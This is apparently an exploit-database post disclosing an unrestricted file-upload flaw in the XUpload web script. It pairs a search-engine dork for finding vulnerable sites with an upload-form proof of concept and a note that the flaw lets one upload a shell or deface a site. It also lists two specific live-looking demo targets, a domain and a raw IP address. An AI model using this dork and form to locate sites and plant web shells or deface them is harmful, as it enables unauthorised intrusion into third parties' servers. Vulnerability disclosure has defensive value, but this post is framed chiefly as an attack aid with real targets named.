XUpload Remote File Upload Vulnerability

2020.11.04
ir h4shur (IR) ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-434

# Title: XUpload Remote File Upload Vulnerability # Author: h4shur # date: 2020-11-04 # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Powered by XUpload" ### NOTE: * You can bypass it to upload your shell or deface. ### POC: * Exploit 1 : site.com/[folder]/[file] <form enctype="multipart/form-data" action="/cgi-bin/upload.cgi?upload_id=" method="post" onSubmit="return StartUpload(this);" target="xupload"> Send file: <input name="file_1" type="file" onChange="checkExt(this.value)"><br> Comment: <input type="text" name="comment">(optional) <br><br> <Input type="checkbox" name="popup"><label FOR="popup" ACCESSKEY="Z">Show upload status in pop-up window</label><br> <br> <input type="submit" value="Upload File"> </form> ### Demo: * http://www.satyrlp.sorokine.fr * http://50.116.78.206/uploadtest/upload_form.html ### Contact Me : * Telegram : @h4shur * Email : h4shursec@gmail.com * Instagram : @netedit0r * twitter : @h4shur


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top